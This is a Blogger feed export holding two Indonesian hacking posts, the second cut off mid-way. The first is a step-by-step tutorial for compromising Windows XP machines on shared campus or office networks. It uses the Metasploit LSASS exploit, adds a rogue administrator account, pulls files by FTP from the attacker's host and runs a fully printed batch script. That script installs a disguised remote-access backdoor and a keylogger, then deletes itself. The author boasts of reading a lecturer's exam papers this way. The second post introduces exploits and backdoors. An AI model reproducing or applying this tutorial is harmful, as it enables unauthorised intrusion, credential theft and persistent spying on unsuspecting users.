<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-9215477832089477726</id><updated>2012-02-16T04:41:36.954-08:00</updated><title type='text'>Just arround the world</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://nazar-justarroundtheworld.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/9215477832089477726/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://nazar-justarroundtheworld.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Nazar_Hidayat</name><uri>http://www.blogger.com/profile/14521167102264738808</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>2</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-9215477832089477726.post-7958098396157206089</id><published>2007-10-08T07:49:00.000-07:00</published><updated>2007-10-08T07:55:18.657-07:00</updated><title type='text'>Metasploit Framework ( make backdoor )</title><content type='html'>Di sini saya akan membagi pengalaman saya, yaitu seputar Exploitasi BUG LSASS di WinNT (Win2K atawa WinXP) menggunakan Metasploit Framework.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sebelumnya saya mohon maaf kalo ada kekurangan di sana-sini. Sebab ini&lt;br /&gt;adalah posting pertama saya ke Jasakom (kalo emang dipublish ama mas&lt;br /&gt;S'to :) ) Oleh karenanya saya mohon bimbingan kepada para Master&lt;br /&gt;Underground sekalian.&lt;br /&gt;&lt;br /&gt;Emang sich LSASS kedengaran agak basi issue-nya, setelah marak issue&lt;br /&gt;vulnerability pada DCOM/RPC lagi-lagi Windows kena pukulan lagi dengan&lt;br /&gt;BUG di LASASS nya.&lt;br /&gt;&lt;br /&gt;Meskipun dah agak lama, tapi toh kenyataannya masih banyak banget yang&lt;br /&gt;belum melakukan update/patch ke system WinXP mereka.&lt;br /&gt;&lt;br /&gt;Bahkan ada yang beranggapan Service Pack 2 justru makin merepotkan User,&lt;br /&gt;karena banyak warning-warning yang sering ia tanyakan ke user.&lt;br /&gt;&lt;br /&gt;Artikel ini mungkin mengasyikkan bagi kita-kita yang berada di daerah&lt;br /&gt;Kampus atau di Kantor yang disediakan fasilitas WLAN Hotspot gratissan.&lt;br /&gt;Karena di sanalah kita bisa mendapatkan banyak target dengan mudah :)&lt;br /&gt;&lt;br /&gt;Mungkin selama ini kita biasa menyerang Server sebagai target, tetapi&lt;br /&gt;apakah Bos kita atau Dosen kita menyimpan data-datanya di Server ?? enggak&lt;br /&gt;khan ??&lt;br /&gt;&lt;br /&gt;Mereka menyimpan data-data mereka di Laptop/Personal Computer nya.&lt;br /&gt;&lt;br /&gt;Seperti pengalaman saya kemarin, bisa melihat Soal-soal UTS dan UAS&lt;br /&gt;dari hasil intruding ke Kompie Dosen saya :P hehehe&lt;br /&gt;&lt;br /&gt;Trus... Siapa sich yang tidak ingin mengintip data-data simpanan si Bos ??&lt;br /&gt;Semua pasti pengen kan?? xixixixixixi :))&lt;br /&gt;&lt;br /&gt;Artikel ini bisa juga dimanfaatkan untuk Exploitasi laen, asalkan targetnya&lt;br /&gt;running under Windows NT. Karena command-command yang saya tulis semua dalam&lt;br /&gt;bahasa commandline windows NT berikut script pembuat backdoornya (Microsoft&lt;br /&gt;Batch Executable Script).&lt;br /&gt;&lt;br /&gt;Praktek yuk ...&lt;br /&gt;Peralatan yang diperlukan adalah:&lt;br /&gt;&lt;br /&gt;* Kita pakai OS Windows saja:&lt;br /&gt;     1. IP Scanner (SuperScan versi 3.00 lumayan handal)&lt;br /&gt;        Download di: http://www.webattack.com/get/superscan.shtml&lt;br /&gt;     2. Metasploit Framework for Win32 (versi terbaru 2.3)&lt;br /&gt;        Download di: http://metasploit.com/tools/framework-2.3.exe&lt;br /&gt;     3. FTP Server program (Pake IIS bisa, pake ArgoFTP dll. suka-suka Anda)&lt;br /&gt;     4. Paket file Backdoor, download di:&lt;br /&gt;http://unique.freeunixhost.com/bnm/HeLL.tar.gz&lt;br /&gt;     5. Remote Admininstrator Viewer, download di:&lt;br /&gt;http://www.famatech.com/download/rviewer3.exe&lt;br /&gt;     6. Script buat naruh/tanam BackDoor (saya buat dengan bahasa BATCH&lt;br /&gt;(bnm.bat) - terlampir)&lt;br /&gt;&lt;br /&gt;BAik mari kita mulai ...&lt;br /&gt;&lt;br /&gt;* Download semua file yang diperlukan di atas.&lt;br /&gt;* Install dulu Metasploit Framework, jalankan Setup nya&lt;br /&gt;(framework-2.3.exe)&lt;br /&gt;* Install SuperScan.&lt;br /&gt;* Install Remote Administrator Viewer.&lt;br /&gt;* Extract file HeLL.tar.gz ke suatu folder, misal c:\door* Siapkan Service FTP&lt;br /&gt;(IIS atau yang lain, bebas). Jalankan Service.&lt;br /&gt;* Set FTP Home directory ke folder c:\door* Set user access Anonymous&lt;br /&gt;bisa mengakses Home directory.&lt;br /&gt;* Tes dengan membuka Explorer, di address bar ketik:&lt;br /&gt;  ftp://localhost atau&lt;br /&gt;  ftp://[ip kita] , misal IP kita: 192.168.1.80 maka coba buka&lt;br /&gt;  ftp://192.168.1.80&lt;br /&gt;&lt;br /&gt;  Ga ada masalah kan ?? Okey kita lanjut ...&lt;br /&gt;&lt;br /&gt;* Selanjutnya kita cari target ... buka aplikasi IP Scanner (SuperScan)&lt;br /&gt;  isi Range IP Start dan Stop IP misalnya mulai 192.168.1.1 sampai 192.168.55.1&lt;br /&gt;  (tergantung keadaan Network Anda, sesuaikan sendiri range targetnya).&lt;br /&gt;&lt;br /&gt;* Misal IP yang kita dapatkan 192.168.1.90 , 192.168.1.102,192.168.1.180 dst.&lt;br /&gt;* Setelah dapat daftar IP target, selanjutnya kita buka Metasploit Framework.&lt;br /&gt;* Setelah siap, muncul prompt: msf &gt; ketik lah command berikut:&lt;br /&gt;&lt;br /&gt;  ----- snapshot -----&lt;br /&gt;  msf &gt; use lsass_ms04_011  [ENTER]&lt;br /&gt;  msf lsass_ms04_011 &gt; set PAYLOAD win32_bind  [ENTER]&lt;br /&gt;  msf lsass_ms04_011(win32_bind) &gt; set RHOST 192.168.1.90  [ENTER]&lt;br /&gt;  msf lsass_ms04_011(win32_bind) &gt; exploit  [ENTER]&lt;br /&gt;&lt;br /&gt;  [*] Starting Bind Handler.&lt;br /&gt;  [*] Detected a Windows XP target (Prof_Joni)&lt;br /&gt;  [*] Windows XP may require two attempts&lt;br /&gt;  [*] Sending 8 DCE request fragments...&lt;br /&gt;  [*] Sending the final DCE fragment&lt;br /&gt;  [*] Got connection from 192.168.1.90:4321 &lt;-&gt; 192.168.1.80:4444&lt;br /&gt;&lt;br /&gt;  Microsoft Windows XP [Version 5.1.2600]&lt;br /&gt;  (C) Copyright 1985-2001 Microsoft Corp.&lt;br /&gt;&lt;br /&gt;  C:\WINDOWS\system32&gt;_&lt;br /&gt;  ----- akhir snapshot ----- &lt;br /&gt;&lt;br /&gt;  Nah, jika tampil seperti itu berarti kita sudah mendapatkan Dropped Shell&lt;br /&gt;  di Metasploit kita.&lt;br /&gt;  Yang tampil disana adalah Shell dari komputer target kita ... yang terhubung&lt;br /&gt;  secara remote.&lt;br /&gt;  Dimana di Shell tersebut kita punya hak akses Administrator (karena hasil&lt;br /&gt;  exploit Buffer Overflow).&lt;br /&gt;&lt;br /&gt;  Artinya: kita punya HAk tak terbatas terhadap komputer target kita :)&lt;br /&gt;  Untuk mengetes, cobak aja ketikkan di sana perintah berikut:&lt;br /&gt;&lt;br /&gt;     C:\WINDOWS\system32&gt; NET USER LoCK /ADD&lt;br /&gt;     C:\WINDOWS\system32&gt; net localgroup Administrators LoCK /add&lt;br /&gt;&lt;br /&gt;  --- snapshot ---&lt;br /&gt;  Microsoft Windows XP [Version 5.1.2600]&lt;br /&gt;  (C) Copyright 1985-2001 Microsoft Corp.&lt;br /&gt;&lt;br /&gt;  C:\WINDOWS\system32&gt;NET USER LoCK /ADD&lt;br /&gt;  NET USER LoCK /ADD&lt;br /&gt;  The command completed successfully.&lt;br /&gt;&lt;br /&gt;  C:\WINDOWS\system32&gt;net localgroup Administrators LoCK /add&lt;br /&gt;  net localgroup Administrators LoCK /add&lt;br /&gt;  The command completed successfully.&lt;br /&gt;  --- akhir snapshot ---&lt;br /&gt;&lt;br /&gt;  Tuh kan, kita bisa menambah user baru dengan group Administrator di&lt;br /&gt;komputer target. hehehe :P&lt;br /&gt;  Sudah ah ... nanti lagi main-mainnya ...&lt;br /&gt;&lt;br /&gt;* Sekarang mari kita buat backdoor agak sewaktu-waktu kita bisa masuk&lt;br /&gt;kembali ke kompie target lagi.&lt;br /&gt;  Masih di prompt Shell DOS tadi, kita ketikkan command-command berikut&lt;br /&gt;ini:&lt;br /&gt;&lt;br /&gt;  --&gt; ingat dalam hal ini IP komputer kita adalah 192.168.1.80&lt;br /&gt;&lt;br /&gt;     C:\WINDOWS\system32&gt; echo OPEN 192.168.1.80&gt;&gt;tmp  [ENTER]&lt;br /&gt;     C:\WINDOWS\system32&gt; echo USER anonymous&gt;&gt;tmp  [ENTER]&lt;br /&gt;     C:\WINDOWS\system32&gt; echo semb@rang.com&gt;&gt;tmp  [ENTER]&lt;br /&gt;     C:\WINDOWS\system32&gt; echo GET bnm.bat&gt;&gt;tmp  [ENTER]&lt;br /&gt;     C:\WINDOWS\system32&gt; echo BYE&gt;&gt;tmp  [ENTER]&lt;br /&gt;     C:\WINDOWS\system32&gt; ftp -n -s:tmp  [ENTER]&lt;br /&gt;     ftp -n -s:tmp&lt;br /&gt;     OPEN 192.168.1.80&lt;br /&gt;     USER anonymous&lt;br /&gt;&lt;br /&gt;     GET bnm.bat&lt;br /&gt;     BYE&lt;br /&gt;&lt;br /&gt;     C:\WINDOWS\system32&gt; bnm.bat 192.168.1.80  [ENTER]&lt;br /&gt;      BOF=======================================================&lt;br /&gt;       BNM's Remote Backdoor Connection Creator&lt;br /&gt;      ==========================================================&lt;br /&gt;             Written by    : UNiQUE aka. BNM&lt;br /&gt;             Last modified : 9:49 AM 1/21/2005&lt;br /&gt;             Last Featues  : * faked r_server&lt;br /&gt;                             * sc-keylogga` added&lt;br /&gt;                             * fake-winsp3 bull-shitting&lt;br /&gt;                             * self-protection added&lt;br /&gt;      ----------------------------------------------------------&lt;br /&gt;&lt;br /&gt;      ----------------------------------------------------------&lt;br /&gt;      #1 Meracik script buat Download File-file yg diperlukan :&lt;br /&gt;      ----------------------------------------------------------&lt;br /&gt;      --- [] File script: 'bnm' telah dibuat.&lt;br /&gt;      ---------------------------------------------------------&lt;br /&gt;      --- [] Lanjut dengan Execute script 'bnm' ...&lt;br /&gt;      ....&lt;br /&gt;      bla bla bla&lt;br /&gt;      ....&lt;br /&gt;      ---------------------------------------------------------&lt;br /&gt;       SEMUA PROSES TELAH SELESAI, HOST INI JADI MILIK ANDA&lt;br /&gt;      ---------------------------------------------------------&lt;br /&gt;       Silahkan Remote dengan Remote Admin ke sini :P&lt;br /&gt;       *** Password : bnm&lt;br /&gt;      ---------------------------------------------------------&lt;br /&gt;       SC-KeyLogga Dah ditanem di sini :P&lt;br /&gt;       *** Mo panen : type bnm.txt&lt;br /&gt;      ---------------------------------------------------------&lt;br /&gt;       ReGarDs,&lt;br /&gt;       UNiQUE aka. BNM&lt;br /&gt;       mail : ns1_pwd_recovery@yahoo.com&lt;br /&gt;       chat : irc.allnetwork.org:6667 #moklet @UNiQUE&lt;br /&gt;      ---------------------------------------------------------&lt;br /&gt;       Have Fun ... but, be responsible ... :P~&lt;br /&gt;      --------------------------------------------------- EOF -&lt;br /&gt;      The system cannot find the path specified.&lt;br /&gt;&lt;br /&gt;      C:\WINDOWS&gt;&lt;br /&gt;     ------------ akhir snapshot ----------&lt;br /&gt;&lt;br /&gt;* Nah ... BAckdoor sudah kita tanam di komputer target.&lt;br /&gt;  Sekarang kita bisa balik kesana lagi kapan saja,&lt;br /&gt;  buka saja aplikasi Remote Admin Viewer (radmin.exe)&lt;br /&gt;  connect ke IP target tersebut. Pilih jenis koneksi:&lt;br /&gt;&lt;br /&gt;     * Full Remote (Full Screen)&lt;br /&gt;     * View Only&lt;br /&gt;     * Telnet&lt;br /&gt;     * File Transfer&lt;br /&gt;     * Shutdown&lt;br /&gt;     * Restart&lt;br /&gt;     * Logoff&lt;br /&gt;     * delele. :)&lt;br /&gt;&lt;br /&gt;* SEKIAN ... That's All Folk !!&lt;br /&gt;&lt;br /&gt; -UNiQUE-&lt;br /&gt;&lt;br /&gt;Shout to: #moklet #crewz #newbie - irc.allnetwork.org&lt;br /&gt;&lt;br /&gt;VIVA Indonesian Underground Commmunity :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------&lt;br /&gt;attachment:&lt;br /&gt;Script   : Pembuat BAckdoor&lt;br /&gt;Bahasa   : Dos Batch Executable&lt;br /&gt;Author   : UNiQUE aka BNM&lt;br /&gt;FileName : bnm.bat&lt;br /&gt;Note     : Buka Notepad copy + paste script berikut, kemudian simpan&lt;br /&gt;dengan nama bnm.bat&lt;br /&gt;&lt;br /&gt;---------- potong mulai dibawah ini ------------------------------&lt;br /&gt;@ echo off&lt;br /&gt;cls&lt;br /&gt;echo&lt;br /&gt;==================================================================&lt;br /&gt;echo    By Using this Script, You're AGREE alias SETUJU atas Perjanjian&lt;br /&gt;Berikut:&lt;br /&gt;echo&lt;br /&gt;==================================================================&lt;br /&gt;echo      SEGALA TINDAK YANG MERUGIKAN ORANG LAIN ATAU SEGALA TINDAK&lt;br /&gt;echo      PENYALAH GUNAAN SCRIPT INI, ADALAH MENJADI TANGGUNG JAWAB ANDA SENDIRI.&lt;br /&gt;echo      PENULIS TIDAK MAU TAHU, KARENA SCRIPT INI MEMANG TDK DIBUAT UNTUK ITU.&lt;br /&gt;echo.&lt;br /&gt;echo      TERIMA KASIH, TENKYU ... :)&lt;br /&gt;echo.&lt;br /&gt;echo      ANY COMMENTS, SEND TO: ns1_pwd_recovery@yahoo.com&lt;br /&gt;echo.&lt;br /&gt;cd %windir%&lt;br /&gt;echo BOF=======================================================&lt;br /&gt;echo        BNM's Remote Backdoor Connection Creator&lt;br /&gt;echo ==========================================================&lt;br /&gt;echo        Written by    : UNiQUE aka. BNM&lt;br /&gt;echo        Last modified : 9:49 AM 1/21/2005&lt;br /&gt;echo        Last Featues  : * faked r_server&lt;br /&gt;echo                        * sc-keylogga` added&lt;br /&gt;echo                        * fake-winsp3 bull-shitting&lt;br /&gt;echo                        * self-protection added&lt;br /&gt;echo ----------------------------------------------------------&lt;br /&gt;echo.&lt;br /&gt;&lt;br /&gt;if "%1"=="" GOTO PIYE&lt;br /&gt;&lt;br /&gt;echo ----------------------------------------------------------&lt;br /&gt;echo #1 Meracik script buat Download File-file yg diperlukan :&lt;br /&gt;echo ----------------------------------------------------------&lt;br /&gt; echo open "%1"&gt;&gt;bnm&lt;br /&gt; echo user anonymous&gt;&gt;bnm&lt;br /&gt; echo password&gt;&gt;bnm&lt;br /&gt; echo binary&gt;&gt;bnm&lt;br /&gt; echo get lsass32.exe&gt;&gt;bnm&lt;br /&gt;REM echo get winsp3.exe&gt;&gt;bnm&lt;br /&gt; echo get svchost32.exe&gt;&gt;bnm&lt;br /&gt; echo get firewall64.exe&gt;&gt;bnm&lt;br /&gt; echo get admdll.dll&gt;&gt;bnm&lt;br /&gt; echo get raddrv.dll&gt;&gt;bnm&lt;br /&gt; echo get kl.dll&gt;&gt;bnm&lt;br /&gt; echo bye&gt;&gt;bnm&lt;br /&gt;echo --- [] File script: 'bnm' telah dibuat.&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo --- [] Lanjut dengan Execute script 'bnm' ...&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt; ftp -n -s:bnm&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo --- [] SeLeSAi ...&lt;br /&gt;echo --- [] Menghapus file script 'bnm'.&lt;br /&gt; del bnm&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo.&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo #2 Menyiapkan Serphiz Remote Admin Server :&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;lsass32 /pass:bnm /silence /install /save&lt;br /&gt;echo --- faked r_server telah di set dengan:&lt;br /&gt;echo ---    [] Password : bnm.&lt;br /&gt;echo ---    [] Jalan sebagai Service.&lt;br /&gt;echo ---    [] Simpan setting ke Registry.&lt;br /&gt;echo ---    [] Mode Silence.&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo.&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo #3 Jalankan Faked Remote Admin Server :&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;start lsass32.exe&lt;br /&gt;echo --- Service Berjalan ....&lt;br /&gt;echo.&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo #4 Menyiapkan Keylogga` :&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;start svchost32 -a -s -f bnm.txt&lt;br /&gt;start firewall64&lt;br /&gt;echo --- SC-Keylogga` telah diset autostart dan berjalan ...&lt;br /&gt;echo.&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo #5 Bull Shitting WinSP3 to the LaMaz :&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;REM copy winsp3.exe c:\winsp3.exe&lt;br /&gt;echo ............. SKIPPED :(&lt;br /&gt;REM echo --- Bull Shitting selesai :P ...&lt;br /&gt;echo.&lt;br /&gt;ipconfig&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo  SEMUA PROSES TELAH SELESAI, HOST INI JADI MILIK ANDA&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo  Silahkan Remote dengan Remote Admin ke sini :P&lt;br /&gt;echo  *** Password Isi aja : bnm&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo  SC-KeyLogga Dah ditanem di sini :P&lt;br /&gt;echo  *** Mo panen, ketik  : type %windir%\bnm.txt&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo  ReGarDs,&lt;br /&gt;echo  UNiQUE aka. BNM&lt;br /&gt;echo  mail : ns1_pwd_recovery@yahoo.com&lt;br /&gt;echo  chat : irc.allnetwork.org:6667 #moklet @UNiQUE&lt;br /&gt;echo ---------------------------------------------------------&lt;br /&gt;echo  Have Fun ... but, be responsible ... :P~&lt;br /&gt;echo --------------------------------------------------- EOF -&lt;br /&gt;del "%0"&lt;br /&gt;GOTO USAI&lt;br /&gt;:PIYE&lt;br /&gt;echo  Parameter IP FTP Host belum dimasukkan!!&lt;br /&gt;echo  contoh:&lt;br /&gt;echo           %0 192.168.5.189&lt;br /&gt;echo.&lt;br /&gt;echo  *** 192.168.5.189 adalah IP FTP Host berisi file BaCKDooRZ&lt;br /&gt;echo.&lt;br /&gt;echo.&lt;br /&gt;:USAI&lt;br /&gt;------------- potong sampai di atas ------------------------&lt;br /&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9215477832089477726-7958098396157206089?l=nazar-justarroundtheworld.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nazar-justarroundtheworld.blogspot.com/feeds/7958098396157206089/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=9215477832089477726&amp;postID=7958098396157206089' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/9215477832089477726/posts/default/7958098396157206089'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/9215477832089477726/posts/default/7958098396157206089'/><link rel='alternate' type='text/html' href='http://nazar-justarroundtheworld.blogspot.com/2007/10/metasploit-framework-make-backdoor.html' title='Metasploit Framework ( make backdoor )'/><author><name>Nazar_Hidayat</name><uri>http://www.blogger.com/profile/14521167102264738808</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9215477832089477726.post-5889650044023952199</id><published>2007-10-04T08:47:00.000-07:00</published><updated>2007-10-04T08:48:45.814-07:00</updated><title type='text'>Eksploit, Trapdoor, Backdoor, dan Trojan Horse</title><content type='html'>&lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;=====================================================================================&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Eksploit, Trapdoor, Backdoor, dan Trojan Horse&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dijelaskan oleh: Ganjaman dan SuperCock [members of IndoHack]&lt;/p&gt;  &lt;p class="MsoNormal"&gt;=====================================================================================&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Artikel ini ditujukan untuk memandu mereka yang masih bingung dengan terminologi sekuritas&lt;/p&gt;  &lt;p class="MsoNormal"&gt;jaringan komputer seperti exploit, trojan, dll dan ingin mengetahui konsep-konsep dasarnya.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Terimakasih kepada staf kecoak yang bersedia mempublikasikan artikel ini, terutama&lt;/p&gt;  &lt;p class="MsoNormal"&gt;LithiumError dan BigD yang telah memberikan masukan-masukan sangat berguna kepada kami.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Seperti biasa, ini hanyalah untuk tujuan informasi saja, dan mungkin sysadmin yang membaca&lt;/p&gt;  &lt;p class="MsoNormal"&gt;bisa menggunakan informasi ini untuk melindungi sistem dibawah pengawasan mereka.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Artikel ini berisi metode backdoor/trapdoor dan kode-kode yang bisa langsung diterapkan,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sebab kami ingin agar para pembaca mengetahui bagaimana * tepatnya * metode ybs bekerja.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Dan lagi, menyensor informasi bukanlah urusan kami.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;1. Eksploit&lt;/p&gt;  &lt;p class="MsoNormal"&gt;===========&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan shell UNIX baru yang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;baru kamu 'dapatkan'. Dan mungkin sekarang kamu sudah mulai bertanya-tanya, "apa sih eksploit&lt;/p&gt;  &lt;p class="MsoNormal"&gt;(exploit, 'sploits) itu?". Dalam konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;artinya dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit 'hacking' lebih&lt;/p&gt;  &lt;p class="MsoNormal"&gt;spesifik lagi, yang kurang lebih bisa diartikan sebagai 'pemanfaatan kelemahan dari sebuah&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sistem untuk tujuan-tujuan yang diluar dari penggunaan normal.' Kelemahan-kelemahan ini bisa&lt;/p&gt;  &lt;p class="MsoNormal"&gt;berupa kesalahan pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan lain-lain.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Umumnya, yang jelas paling menarik perhatian kita, adalah eksploit yang akan memberikan kita&lt;/p&gt;  &lt;p class="MsoNormal"&gt;akses tidak terbatas ke seluruh aspek dari sebuah sistem. Dalam UNIX, sering kita dengar istilah&lt;/p&gt;  &lt;p class="MsoNormal"&gt;'mengeksploit program anu untuk mendapat privilese root'. Tentu saja mendapatkan 'root' bukanlah&lt;/p&gt;  &lt;p class="MsoNormal"&gt;satu-satunya tujuan pengeksploitan sistem. &lt;span style="" lang="FR"&gt;Seperti yang mungkin anda sudah alami sendiri, kadang&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sebuah cacat dalam program seperti maild atau ftpd bisa dimanfaatkan untuk tujuan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;'header forging', 'ip spoofing', 'denial of service attack', dan 'mail bombing'&lt;/p&gt;  &lt;p class="MsoNormal"&gt;(hello, Anton Pardede!).&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan eksploit remote.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Eksploit lokal adalah jenis eksploit yang hanya bisa dijalankan jika kamu sudah punya akses ke&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dalam suatu sistem (baik itu melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk di-eksploit. Contoh - contoh&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dari eksploit jenis ini adalah buffer overflow (i.e. mh di RedHat 5, SuperProbe, dll), race&lt;/p&gt;  &lt;p class="MsoNormal"&gt;conditions (dimana dua proses saling berlomba untuk menyelesaikan tugas masing-masing, biasanya&lt;/p&gt;  &lt;p class="MsoNormal"&gt;proses A disuruh untuk menjalankan suatu utilitas yang membutuhkan privilese root temporer sementara&lt;/p&gt;  &lt;p class="MsoNormal"&gt;proses B dirancang untuk mencegat proses A sebelum proses A kembali statusnya ke privilese user&lt;/p&gt;  &lt;p class="MsoNormal"&gt;biasa, mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi di mesin-mesin IRIX dan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;SunOS.) Bagaimana caranya agar saya bisa mendapatkan eksploit seperti ini? Tentu saja kamu bisa&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;menghabiskan waktu berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol (lebih&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;baik dilakukan di kotak kamu sendiri), seperti para 'elite' lainnya. Biasanya eksploit diprogram&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;dengan C, perl, atau sh. Namun kalau ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas),&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;banyak eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di situs-situs tertentu,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;seperti:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;http://www.rootshell.com&lt;/p&gt;  &lt;p class="MsoNormal"&gt;http://www.antionline.com&lt;/p&gt;  &lt;p class="MsoNormal"&gt;http://www.rhino9.com&lt;/p&gt;  &lt;p class="MsoNormal"&gt;http://www.dhp.com/~fyodor&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;atau di situs kecoak, http://k-elektronik.org/arsip/eksploit (*udah mati: editor)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa mengeksploit sistem tanpa&lt;/p&gt;  &lt;p class="MsoNormal"&gt;mengetahui otorisasi user/password. Tentu saja eksploit-eksploit jenis ini jauh lebih sedikit&lt;/p&gt;  &lt;p class="MsoNormal"&gt;jumlahnya, dan terkadang dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah&lt;/p&gt;  &lt;p class="MsoNormal"&gt;satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file /etc/passwd (dulu LithErr pernah&lt;/p&gt;  &lt;p class="MsoNormal"&gt;memberi resep cepat memanfaatkan phf). Mungkin belum terlihat fatal, namun sekalinya sang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;'cracker' berhasil masuk ke dalam sistem memanfaatkan login dan password dari salah seorang user,&lt;/p&gt;  &lt;p 